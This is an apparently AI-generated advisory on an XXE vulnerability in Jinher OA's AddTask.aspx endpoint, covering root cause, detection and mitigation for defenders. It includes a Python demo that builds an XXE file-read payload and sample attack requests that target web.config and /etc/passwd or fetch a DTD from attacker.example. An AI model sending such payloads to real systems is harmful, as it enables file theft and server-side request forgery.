
CVE-2025-10092: Jinher OA XXE Vulnerability

CVE-2025-10092 is an XML external entity (XXE) vulnerability in Jinher OA. A remote attacker can submit XML whose document type definition declares an external entity, and the server-side XML parser resolves it. This article covers the technical details, affected versions, impact, and mitigation.


CVE-2025-10092 Overview

CVE-2025-10092 is an XML External Entity (XXE) vulnerability affecting Jinher OA up to version 1.2. The flaw resides in the XML Handler component, specifically in the /c6/Jhsoft.Web.projectmanage/TaskManage/AddTask.aspx/?Type=add endpoint. Attackers can manipulate XML input to trigger external entity references, leading to information disclosure or server-side request forgery. The vulnerability is exploitable remotely over the network without authentication. Public disclosure of the exploit increases the likelihood of opportunistic attacks against exposed instances.

Critical Impact

Remote, unauthenticated attackers can abuse XML external entity processing in the AddTask.aspx endpoint to read local files or perform server-side request forgery against internal resources.

Affected Products

  • Jinher OA versions up to and including 1.2
  • Component: XML Handler in /c6/Jhsoft.Web.projectmanage/TaskManage/AddTask.aspx
  • Vendor: Jinher

Discovery Timeline

  • 2025-09-08 - CVE-2025-10092 published to NVD
  • 2026-04-29 - Last updated in NVD database

Technical Details for CVE-2025-10092

Vulnerability Analysis

The vulnerability is classified under [CWE-611] Improper Restriction of XML External Entity Reference and [CWE-610] Externally Controlled Reference to a Resource in Another Sphere. Jinher OA accepts XML input through the AddTask.aspx endpoint without disabling external entity resolution in its XML parser. An attacker crafts an XML payload whose Document Type Definition (DTD) declares an entity with a SYSTEM identifier (a file path or URL) and references that entity from an element the application reads. When the application parses the input, the XML processor dereferences the identifier and substitutes the fetched content for the entity reference, so whatever the application stores or echoes back from that element now carries the referenced file's contents. This lets an attacker read files accessible to the application service account or make the server issue outbound requests to hosts of the attacker's choosing; where nothing is echoed back, parameter entities can be used to carry the data out inside such a request.

Root Cause

The root cause is an insecurely configured XML parser within the project task management module. The parser neither rejects DOCTYPE declarations nor disables external entity resolution before processing untrusted XML. In .NET terms, this is an XmlDocument or XmlReader whose XmlResolver is left at its default (an XmlUrlResolver that fetches file and http identifiers; XmlDocument behaves this way on .NET Framework versions before 4.5.2) rather than set to null, with XmlReaderSettings.DtdProcessing left at Parse instead of Prohibit. Web applications that rely on those defaults remain exposed to this class of attack.
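To make the misconfiguration concrete, here is an added example (not Jinher OA code, which is .NET, and not from the page's reporter) that runs the classic XXE payload shape through Python's standard-library SAX parser in three configurations. The SAX feature `feature_external_ges` plays the role of XmlResolver (True fetches SYSTEM identifiers, False ignores them), and a lexical handler that raises on `startDTD` plays the role of DtdProcessing.Prohibit. The stand-in configuration file, its contents and the payload are constructed for the demonstration, and file paths are assumed to be POSIX.

```python
"""Vulnerable vs. hardened XML parsing for the CVE-2025-10092 pattern.

Added illustration, not Jinher OA code. Python's stdlib SAX parser has direct
analogues of the .NET settings named in the advisory:
  * feature_external_ges (True/False)        ~ XmlResolver set / XmlResolver = null
  * a LexicalHandler whose startDTD() raises ~ DtdProcessing.Prohibit
The stand-in "web.config" file and the payload are constructed for the demo.
"""
import io
import os
import tempfile
import xml.sax
from pathlib import Path
from xml.sax.handler import ContentHandler, feature_external_ges, property_lexical_handler


class DtdProhibited(ValueError):
    """Raised when a DOCTYPE appears and the parser was told to prohibit DTDs."""


class ProhibitDtd:
    """LexicalHandler that rejects any DOCTYPE (SAX analogue of DtdProcessing.Prohibit)."""

    def startDTD(self, name, public_id, system_id):
        raise DtdProhibited(f"DOCTYPE '{name}' rejected: DTD processing is disabled")

    def endDTD(self):
        pass

    def startCDATA(self):
        pass

    def endCDATA(self):
        pass

    def comment(self, content):
        pass


class TitleCollector(ContentHandler):
    """Reads the <title> text the way an application would read a task title."""

    def __init__(self):
        super().__init__()
        self.in_title = False
        self.parts = []

    def startElement(self, name, attrs):
        self.in_title = name == "title"

    def endElement(self, name):
        if name == "title":
            self.in_title = False

    def characters(self, content):
        if self.in_title:
            self.parts.append(content)


def parse_task_title(xml_bytes: bytes, mode: str) -> str:
    """mode: 'vulnerable' fetches external entities; 'no_external' ignores them
    (the stdlib default since Python 3.7.1); 'prohibit_dtd' refuses any DOCTYPE."""
    parser = xml.sax.make_parser()
    parser.setFeature(feature_external_ges, mode == "vulnerable")
    if mode == "prohibit_dtd":
        parser.setProperty(property_lexical_handler, ProhibitDtd())
    handler = TitleCollector()
    parser.setContentHandler(handler)
    parser.parse(io.BytesIO(xml_bytes))
    return "".join(handler.parts)


def xxe_payload(target_file: str) -> bytes:
    """Classic XXE shape: the DTD declares an external general entity pointing at a
    local file, and the document references it inside an element the app reads."""
    uri = Path(target_file).resolve().as_uri()  # file:///... (POSIX path assumed)
    return (
        '<?xml version="1.0"?>\n'
        f'<!DOCTYPE task [<!ENTITY xxe SYSTEM "{uri}">]>\n'
        "<task><title>&xxe;</title></task>"
    ).encode()


def demo() -> dict:
    """Run one payload through all three configurations and report what the
    application would have stored as the task title in each case."""
    with tempfile.NamedTemporaryFile("w", suffix=".config", delete=False) as f:
        f.write("connectionString=constructed-secret")  # stand-in for web.config
        secret = f.name
    try:
        payload = xxe_payload(secret)
        results = {
            "vulnerable": parse_task_title(payload, "vulnerable"),
            "no_external": parse_task_title(payload, "no_external"),
        }
        try:
            results["prohibit_dtd"] = parse_task_title(payload, "prohibit_dtd")
        except DtdProhibited as exc:
            results["prohibit_dtd"] = f"rejected: {exc}"
    finally:
        os.unlink(secret)
    return results


if __name__ == "__main__":
    for mode, outcome in demo().items():
        print(f"{mode:>12}: {outcome}")
```

The vulnerable configuration returns the stand-in file's contents as the task title, which is exactly the read primitive described above; the `no_external` configuration silently drops the entity, and `prohibit_dtd` fails closed before any entity is declared. Of the two hardened modes, rejecting the DOCTYPE outright is the one to prefer when the endpoint has no legitimate reason to accept a DTD, since it also removes entity-expansion denial-of-service payloads that need no external resolution.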

Attack Vector

An unauthenticated attacker submits a crafted HTTP request to /c6/Jhsoft.Web.projectmanage/TaskManage/AddTask.aspx/?Type=add containing XML with a malicious external entity definition. The server parses the input, resolves the entity, and returns or processes the referenced content. Attackers commonly exploit this pattern to read sensitive files such as web.config, application source files, or system configuration, and to probe internal network services. The exploit has been made public through external references including the GitHub issue tracker and VulDB submission 644868.

No verified proof-of-concept code is included here. Refer to the GitHub CVE Issue Discussion for technical details published by the reporter.

Detection Methods for CVE-2025-10092

Indicators of Compromise

  • HTTP requests to /c6/Jhsoft.Web.projectmanage/TaskManage/AddTask.aspx whose body (or, for GET, whose query string) contains <!DOCTYPE or <!ENTITY declarations, possibly URL-encoded
  • Outbound network connections from the Jinher OA server to unexpected external hosts following XML requests
  • Web server access logs showing requests with Type=add parameter and XML content types from unauthenticated sources

Detection Strategies

  • Inspect web application firewall (WAF) logs for XML payloads containing DTD or SYSTEM entity references targeting the AddTask.aspx endpoint
  • Correlate inbound XML POST requests with subsequent outbound DNS or HTTP requests originating from the application server process
  • Monitor file access events on the Jinher OA host for unusual reads of configuration files (for example web.config) by the IIS worker process (w3wp.exe) serving the application pool
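The indicators and strategies above, turned into a small offline detector as an added example (not from the page or the vendor): it checks captured requests for the affected path and for DTD and SYSTEM markers, and handles two things a naive string match misses. IIS resolves paths case-insensitively, so `/C6/.../addtask.ASPX` reaches the same handler and the path match must ignore case, and attackers routinely URL-encode payloads, so the body is decoded before matching. The `(method, url, body)` record format, all sample requests, and the host `attacker.example` are constructed for the example.

```python
"""Offline detector for XXE attempts against the Jinher OA AddTask.aspx endpoint.

Added example, not part of the original page or the vendor's tooling. Input is a
list of (method, url, body) records, an assumption standing in for whatever a WAF
audit log or reverse proxy provides; every record below is constructed.
"""
import re
from urllib.parse import unquote_plus, urlsplit

TARGET_PATH = "/c6/Jhsoft.Web.projectmanage/TaskManage/AddTask.aspx"

# Indicators named in the advisory, plus the parameter-entity form used for
# blind / out-of-band XXE when the application echoes nothing back.
XXE_INDICATORS = [
    ("doctype", re.compile(r"<!DOCTYPE", re.I)),
    ("entity_decl", re.compile(r"<!ENTITY", re.I)),
    ("parameter_entity", re.compile(r"<!ENTITY\s+%", re.I)),
    ("external_system_id", re.compile(r"""SYSTEM\s+["'](?:file|https?|ftp):""", re.I)),
]


def decode_payload(raw: str, rounds: int = 3) -> str:
    """URL-decode repeatedly (bounded) so single- and double-encoded payloads such
    as %3C%21DOCTYPE and %253C%2521DOCTYPE both surface as <!DOCTYPE."""
    for _ in range(rounds):
        decoded = unquote_plus(raw)
        if decoded == raw:
            break
        raw = decoded
    return raw


def targets_vulnerable_endpoint(url: str) -> bool:
    """Match the disclosed path regardless of case, trailing slash or query string
    (the disclosed URL is .../AddTask.aspx/?Type=add)."""
    path = urlsplit(url).path.rstrip("/").lower()
    return path == TARGET_PATH.lower()


def inspect_request(method: str, url: str, body: str) -> dict:
    """Verdict for one request: which indicators fired and how serious it looks."""
    if not targets_vulnerable_endpoint(url):
        return {"hit": False, "indicators": [], "severity": "none"}
    haystack = decode_payload(urlsplit(url).query) + "\n" + decode_payload(body)
    fired = [name for name, rx in XXE_INDICATORS if rx.search(haystack)]
    if "external_system_id" in fired or "parameter_entity" in fired:
        severity = "high"  # an external reference: file read or SSRF attempt
    elif fired:
        severity = "medium"  # a DTD with no external reference is still unexpected here
    else:
        severity = "none"
    return {"hit": bool(fired), "indicators": fired, "severity": severity}


# Constructed sample traffic: one benign task creation, two attack variants, and
# the same attack aimed at an unrelated path.
SAMPLE_REQUESTS = [
    ("POST", "/c6/Jhsoft.Web.projectmanage/TaskManage/AddTask.aspx/?Type=add",
     "<task><title>Quarterly report</title></task>"),
    ("POST", "/c6/Jhsoft.Web.projectmanage/TaskManage/AddTask.aspx/?Type=add",
     '<?xml version="1.0"?><!DOCTYPE t [<!ENTITY xxe SYSTEM '
     '"file:///C:/inetpub/wwwroot/web.config">]><task><title>&xxe;</title></task>'),
    # Mixed-case path and URL-encoded blind-XXE body: IIS still routes this to AddTask.aspx.
    ("POST", "/C6/jhsoft.web.PROJECTMANAGE/taskmanage/addtask.ASPX?type=add",
     "xml=%3C%21DOCTYPE+t+%5B%3C%21ENTITY+%25+dtd+SYSTEM+%22http%3A%2F%2F"
     "attacker.example%2Fe.dtd%22%3E%25dtd%3B%5D%3E%3Ct%2F%3E"),
    ("POST", "/c6/SomeOther.aspx",
     '<!DOCTYPE t [<!ENTITY xxe SYSTEM "file:///etc/passwd">]><t>&xxe;</t>'),
]


def scan(requests=SAMPLE_REQUESTS) -> list:
    """Return (index, verdict) for every request that fired at least one indicator."""
    alerts = []
    for i, (method, url, body) in enumerate(requests):
        verdict = inspect_request(method, url, body)
        if verdict["hit"]:
            alerts.append((i, verdict))
    return alerts


if __name__ == "__main__":
    for index, verdict in scan():
        print(f"request #{index}: {verdict['severity']} {verdict['indicators']}")
```

On the constructed sample the detector flags the plain file-read payload and the encoded, mixed-case, out-of-band variant, and ignores both the benign task creation and the identical payload aimed elsewhere. The same case-insensitivity and decoding considerations apply to any WAF rule written for this endpoint, including the ModSecurity example under Workarounds.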

Monitoring Recommendations

  • Enable verbose logging on the IIS application pool serving Jinher OA and ship logs to a centralized SIEM
  • Deploy network detection signatures for XXE patterns such as SYSTEM "file://, SYSTEM "http://, and external DTD fetches
  • Alert on anomalous egress traffic from internal application servers to untrusted destinations

How to Mitigate CVE-2025-10092

Immediate Actions Required

  • Restrict network access to the Jinher OA /c6/Jhsoft.Web.projectmanage/TaskManage/AddTask.aspx endpoint to trusted networks only
  • Deploy WAF rules that block XML payloads containing <!DOCTYPE or <!ENTITY declarations targeting Jinher OA endpoints
  • Audit web server and application logs for prior exploitation attempts against the affected endpoint

Patch Information

At the time of publication, no vendor advisory or official patch has been listed in the enriched CVE data. Organizations running Jinher OA up to version 1.2 should contact the vendor directly for remediation guidance and monitor the VulDB entry 323047 for updates.

Workarounds

  • Configure the XML parser to disable DTD processing and set the XmlResolver property to null in affected .NET components if source-level remediation is feasible
  • Place the Jinher OA application behind a reverse proxy that strips or rejects XML content containing external entity declarations
  • Apply egress filtering to prevent the application server from initiating outbound connections to arbitrary hosts, limiting SSRF impact
```apache
# Example ModSecurity v2 rule to block XXE payloads against the affected endpoint.
# REQUEST_BODY is only populated when SecRequestBodyAccess is On. The path is matched
# after t:lowercase because IIS resolves URLs case-insensitively; tune or drop the
# DOCTYPE term if legitimate clients send a DTD to this endpoint.
SecRule REQUEST_URI "@contains /c6/jhsoft.web.projectmanage/taskmanage/addtask.aspx" \
    "id:1009201,phase:2,deny,status:403,log,t:none,t:lowercase,\
    msg:'Potential XXE against Jinher OA AddTask.aspx',chain"
    SecRule REQUEST_BODY "@rx (?i)(<!DOCTYPE|<!ENTITY|SYSTEM\s+[\"'])" "t:none,t:urlDecodeUni"
```

Disclaimer: This content was generated using AI. While we strive for accuracy, please verify critical information with official sources.
